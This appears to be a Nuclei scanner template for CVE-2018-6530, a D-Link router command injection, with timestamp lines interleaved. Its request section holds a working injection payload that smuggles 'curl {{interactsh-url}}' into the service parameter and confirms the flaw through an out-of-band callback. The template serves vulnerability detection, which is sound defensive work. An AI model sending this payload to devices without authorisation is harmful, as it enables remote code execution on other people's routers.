2022-10-02 13:15:14 +00:00
id : CVE-2018-6530
info :
name : D-Link - Unauthenticated Remote Code Execution
author : gy741
severity : critical
description : |
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
2022-10-02 13:15:14 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2018-6530
- https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
2023-07-11 19:49:27 +00:00
- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdf
- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdf
2022-10-02 13:15:14 +00:00
classification :
2023-11-09 06:04:52 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-10-02 13:15:14 +00:00
cvss-score : 9.8
cve-id : CVE-2018-6530
cwe-id : CWE-78
2024-01-14 13:49:27 +00:00
epss-score : 0.93644
2024-06-07 10:04:29 +00:00
epss-percentile : 0.99102
2023-11-09 06:04:52 +00:00
cpe : cpe:2.3:o:dlink:dir-860l_firmware:*:*:*:*:*:*:*:*
2023-07-04 06:06:54 +00:00
metadata :
max-request : 1
2023-11-09 06:04:52 +00:00
vendor : dlink
2023-07-11 19:49:27 +00:00
product : dir-860l_firmware
2023-12-05 09:50:33 +00:00
tags : cve,cve2018,d-link,rce,oast,unauth,kev,dlink
2022-10-02 13:15:14 +00:00
2023-07-08 06:22:35 +00:00
http :
2022-10-02 13:15:14 +00:00
- raw :
- |
POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : identity
SOAPAction : "whatever-serviceType#whatever-action"
Content-Type : text/xml
whatever-content
2023-07-04 05:45:03 +00:00
matchers-condition : and
2022-10-02 13:15:14 +00:00
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2023-07-03 06:46:42 +00:00
- type : word
part : interactsh_request
words :
- "User-Agent: curl"
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100c4e521bec5b1a3e4c733f83557f03f44cdd06172dcd4d0951550849c8a7118bb022100871841f27984f32a681caba8da22e8bfe7fa318a49bf09eceea3d931be277362:922c64590222798bb761d5b6d8e72950